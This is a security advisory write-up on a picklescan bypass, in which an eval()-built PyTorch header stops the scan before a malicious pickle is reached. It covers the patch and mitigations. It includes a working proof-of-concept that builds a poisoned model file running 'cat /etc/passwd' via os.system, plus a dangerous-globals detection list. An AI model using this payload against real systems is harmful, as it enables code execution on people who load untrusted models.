GHSA-97F8-7CMV-76J2
CVSS 7.5 · EPSS 0.12%
The Magician's Trick: Bypassing Picklescan with Dynamic Eval

Amit Schendel
Senior Security Researcher

Feb 18, 2026 · 6 min read

PoC Available

Executive Summary (TL;DR)

Picklescan, a tool for detecting malicious AI models, can be blinded by a simple trick. If the PyTorch 'magic number' header is generated dynamically (e.g., via `eval`), Picklescan's header check fails with an exception and the scan stops. Meanwhile, PyTorch happily evaluates the header and executes the hidden malware waiting behind it.

A logic flaw in the Picklescan security tool allows attackers to bypass malware detection in PyTorch models. By dynamically generating the file header (magic number) using pickle opcodes, an attacker can cause the scanner to abort analysis early, effectively hiding malicious payloads located later in the file stream.

The Hook: Trusting the Wrapper

In the Wild West of AI/ML security, picklescan is the sheriff. It's the tool that Hugging Face and security-conscious developers use to check whether that shiny new Llama-3 fine-tune you just downloaded is actually a useful neural network or just a ransomware loader in disguise. It works by statically analyzing Python pickle files (the underlying format for PyTorch models), looking for dangerous function calls like os.system or subprocess.Popen.

The premise is simple: read the bytecode, spot the bad functions, and flag them before the victim runs torch.load(). But here is the problem with static analysis on a format that is effectively a Turing-complete stack machine: sometimes, the analyzer assumes the data follows the rules, while the interpreter (PyTorch) just executes whatever it's given.
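
As a toy illustration of that premise, here is how opcode-level spotting works, using the standard library's pickletools module. (picklescan's real rule set and stack modeling are far more thorough; flag_dangerous_globals and the DANGEROUS set are our own illustrative names.)

import pickletools

# Module/name pairs a scanner would treat as dangerous. Note that
# os.system pickles by reference as posix.system (nt.system on
# Windows), so the list has to cover the real module names.
DANGEROUS = {
    ("posix", "system"), ("nt", "system"),
    ("subprocess", "Popen"), ("builtins", "eval"),
}

def flag_dangerous_globals(data: bytes) -> list:
    """Collect dangerous globals referenced by GLOBAL/STACK_GLOBAL opcodes."""
    hits, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Older protocols: arg is "module name" in a single string.
            module, _, name = arg.partition(" ")
            if (module, name) in DANGEROUS:
                hits.append((module, name))
        elif "UNICODE" in opcode.name:
            strings.append(arg)  # candidate operands for STACK_GLOBAL
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Newer protocols: module and name are pushed as strings first.
            if (strings[-2], strings[-1]) in DANGEROUS:
                hits.append((strings[-2], strings[-1]))
    return hits

# Serializing os.system only writes a reference; nothing executes here.
import pickle, os
print(flag_dangerous_globals(pickle.dumps(os.system)))  # [('posix', 'system')] on Linux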

This vulnerability is a classic case of "Parser Differential." The security tool sees a malformed header and throws a tantrum (and an exception), effectively quitting the job. The target application sees valid bytecode, executes it, and promptly hands over a reverse shell. It's like a bouncer checking an ID, finding it written in crayon, and fainting on the spot—letting the attacker walk right over their unconscious body.

The Flaw: A Magic Number Illusion

To understand this bug, you have to understand how legacy PyTorch files work. They are essentially a sequence of pickle payloads written back-to-back into a single file. The first pickle in the sequence is supposed to be a "Magic Number", specifically 0x1950A86A20F9469CFC6C. This confirms to PyTorch that "Yes, this is a PyTorch file."
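
For intuition, here is what that honest header looks like at the opcode level, disassembled with the stdlib pickletools module (output abbreviated):

import pickle, pickletools

MAGIC_NUMBER = 0x1950A86A20F9469CFC6C

# A well-formed legacy header: one literal integer, one LONG1 opcode.
pickletools.dis(pickle.dumps(MAGIC_NUMBER, protocol=2))
#    0: \x80 PROTO      2
#    2: \x8a LONG1      119547037146038801333356
#   14: .    STOP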

Picklescan's developers made a logical, but fatal, assumption: they assumed this magic number would be a static integer literal. Their code looked at the first pickle and asked, "Is this an integer opcode?"

Here is where it gets dark. In the pickle protocol, you don't have to provide a static integer. You can provide a function that returns an integer. An attacker can craft a pickle that says, "I am not a number, I am a function call to eval() that calculates a number."
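
Disassemble that trick and the parser differential is visible in the raw opcodes: no integer literal anywhere, just a GLOBAL/REDUCE pair, i.e., a function call. (LazyMagic is our illustrative name; the exploit section below builds the same thing as MagicBypass.)

import pickle, pickletools

class LazyMagic:
    def __reduce__(self):
        # Serialize as "call eval('0x19...')" instead of a literal int.
        return (eval, ("0x1950A86A20F9469CFC6C",))

blob = pickle.dumps(LazyMagic(), protocol=2)
pickletools.dis(blob)
#    0: \x80 PROTO      2
#    2: c    GLOBAL     'builtins eval'
#   ...
#        \x85 TUPLE1
#        R    REDUCE    <- a function call where an integer should be
#        .    STOP

# At load time, the value is identical to the real magic number:
assert pickle.loads(blob) == 0x1950A86A20F9469CFC6C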

When picklescan encounters this, its get_magic_number function fails to find a literal integer. It returns None. The scanner then compares None to the expected magic number, sees they don't match, and raises an InvalidMagicError. Crucially, this exception aborts the entire scan. The scanner stops reading. But a standard torch.load() call? It happily executes the eval(), gets the correct number, and continues loading the rest of the file—where the actual malware lives.

The Code: Static Assumptions vs. Dynamic Reality

Let's look at the smoking gun. The vulnerability lived in src/picklescan/scanner.py. The code tried to verify the header before moving on to the dangerous stuff.

The Vulnerable Logic:

# The scanner tries to pull a static int
magic = get_magic_number(data)
 
# If it's not the static int, it throws an error and aborts
if magic != MAGIC_NUMBER:
    raise InvalidMagicError(magic, MAGIC_NUMBER, file_id)
 
# ... scanning of the actual model data happens down here ...

The get_magic_number helper only understood pickle.INT or pickle.LONG opcodes. It had no concept of a REDUCE opcode, a function call, generating the value at load time.
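
In simplified form (our reconstruction of the pre-patch behavior, not the exact upstream source), the helper acts like this:

import pickle
import pickletools

def get_magic_number(data: bytes):
    """Return the first integer literal in the stream, or None."""
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("INT", "LONG", "LONG1", "LONG4",
                           "BININT", "BININT1", "BININT2"):
            return arg
        if opcode.name in ("PROTO", "FRAME"):
            continue  # framing noise, keep looking
        return None   # first real opcode is not an integer literal
    return None

honest = pickle.dumps(0x1950A86A20F9469CFC6C, protocol=2)
print(get_magic_number(honest))  # 119547037146038801333356
# With the eval() header, the first real opcode is GLOBAL, so this
# returns None; None != MAGIC_NUMBER, InvalidMagicError, scan over.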

The Patch (Commit b999763):

The fix is clever. It acknowledges that if the magic number check fails, it might be an attack. Instead of crashing, it inspects that first pickle for dangerous globals.

magic = get_magic_number(data)
if magic != MAGIC_NUMBER:
    # Reset stream to the beginning
    data.seek(0)
    # Scan the "header" as if it were a payload
    first_pickle_result = scan_pickle_bytes(data, file_id, multiple_pickles=False)
    
    # If the header contains globals (like eval), flag it!
    if first_pickle_result.globals:
        _log.debug(f"Potential PyTorch magic number bypass detected in {file_id}...")
        scan_result.merge(first_pickle_result)
    else:
        # Genuine corruption, raise the error
        raise InvalidMagicError(magic, MAGIC_NUMBER, file_id)

Now, if you try to hide eval() in the header, picklescan catches it.

The Exploit: Crafting the Poisoned Header

To exploit this, we need to construct a PyTorch file that is valid enough for torch, but invalid enough to crash picklescan. We use the __reduce__ method to define how our objects are pickled.

Here is the recipe for disaster:

  1. Pickle #1 (The Decoy): Instead of writing the magic integer 0x19..., we write an instruction to eval("0x19..."). picklescan chokes on this. torch swallows it.
  2. Pickles #2–4 (The Filler): Standard PyTorch metadata (protocol version, sys_info, etc.) so torch doesn't complain.
  3. Pickle #5 (The Payload): The actual malicious code, like os.system.
import pickle
import os
 
# 1. The Magic Number Bypass
class MagicBypass:
    def __reduce__(self):
        # This evaluates to the correct magic number at runtime
        # but looks like a function call to static analysis.
        return (eval, ("0x1950A86A20F9469CFC6C",))
 
# 2. The Payload
class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ("id; cat /etc/passwd",))
 
with open("exploit.pt", "wb") as f:
    # The magic bypass (Picklescan crashes here)
    pickle.dump(MagicBypass(), f, protocol=2)
    
    # Required PyTorch legacy metadata so torch's loader doesn't complain
    pickle.dump(1001, f, protocol=2)  # torch's legacy protocol_version
    pickle.dump({}, f, protocol=2)    # sys_info dict
    pickle.dump([], f, protocol=2)
    
    # The payload (Picklescan never reaches here)
    pickle.dump(MaliciousPayload(), f, protocol=2)
    pickle.dump(None, f, protocol=2)

When picklescan <= 1.0.2 scans this file, it throws an error on the first pickle and exits. The user, assuming the tool is just being finicky or the file is slightly weird, might load it anyway. When they run torch.load('exploit.pt'), the code executes.
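
The victim-side trigger is a single call. One caveat: this assumes the legacy full-unpickling path; recent PyTorch releases default torch.load to weights_only=True, which refuses arbitrary pickles like these.

import torch

# Unpickling the poisoned file runs the embedded os.system payload;
# even if the load itself errors out afterwards, the damage is done.
# weights_only=False reproduces the legacy behavior described above.
torch.load("exploit.pt", weights_only=False)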

The Impact: Supply Chain Poisoning

Why is this critical? Because the entire AI ecosystem relies on trust. We download gigabytes of weights from Hugging Face, Civitai, and GitHub. Tools like picklescan are the only line of defense between a Data Scientist's laptop and a total compromise.

If an attacker can bypass the scanner, they can upload a "fine-tuned" model that contains a backdoor. Since the scanner reports an error (often interpreted as "parsing failed" rather than "malware found") or simply crashes, automated pipelines might fail open, or human analysts might ignore the warning.

The result? Remote Code Execution (RCE) on any machine that loads the model. In an ML cluster, that means access to GPU resources, training data, and proprietary model weights.

The Fix: Upgrade or Die

The mitigation is straightforward: Update picklescan to version 1.0.3 or higher.

If you are building your own scanner, the lesson here is broader: Never trust the file format to enforce its own structure. If you are parsing serialization formats like Pickle, YAML, or XML, assume the parser can be tricked.

Specifically for Pickle:

  1. Do not abort on header errors; treat them as suspicious.
  2. Scan the entire stream, even if the beginning looks like garbage.
  3. Better yet, stop using Pickle for ML models. Switch to safetensors, a safe, zero-copy format that involves no code execution (see the sketch below).
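
On that last point, the migration is genuinely small. A minimal sketch using the safetensors package (the tensor names are illustrative):

import torch
from safetensors.torch import save_file, load_file

# Plain tensors only: no pickle opcodes, no code execution on load.
weights = {
    "linear.weight": torch.randn(4, 4),
    "linear.bias": torch.zeros(4),
}
save_file(weights, "model.safetensors")

restored = load_file("model.safetensors")  # a plain dict of tensors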

Official Patches

  • Picklescan (GitHub): commit b999763, patching the magic number bypass


Technical Appendix

CVSS Score: 7.5 / 10
Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Probability: 0.12%

Affected Systems

  • picklescan <= 1.0.2
  • Systems ingesting untrusted PyTorch models
  • MLOps pipelines relying on picklescan for validation

Affected Versions Detail

  • Product: picklescan (maintainer: mmaitre314)
  • Affected Versions: <= 1.0.2
  • Fixed Version: 1.0.3

  • Attack Vector: Local / File-based
  • Impact: Remote Code Execution (RCE)
  • CWE: CWE-693: Protection Mechanism Failure
  • CVSS: 7.5 (High)
  • Component: picklescan.scanner.scan_pytorch
  • Detection: Bypassed via dynamic header generation

MITRE ATT&CK Mapping

  • T1027: Obfuscated Files or Information (Defense Evasion)
  • T1204.002: User Execution: Malicious File (Execution)
  • T1574: Hijack Execution Flow (Persistence)
  • CWE-693: Protection Mechanism Failure

Vulnerability Timeline

  • 2026-02-01: Vulnerability Discovered
  • 2026-02-15: Patch Committed (b999763)
  • 2026-02-20: Advisory GHSA-97F8-7CMV-76J2 Published

References & Sources

  • [1] GHSA Advisory: GHSA-97F8-7CMV-76J2
  • [2] Issue Tracker Discussion

Attack Flow Diagram

[Interactive attack flow diagram]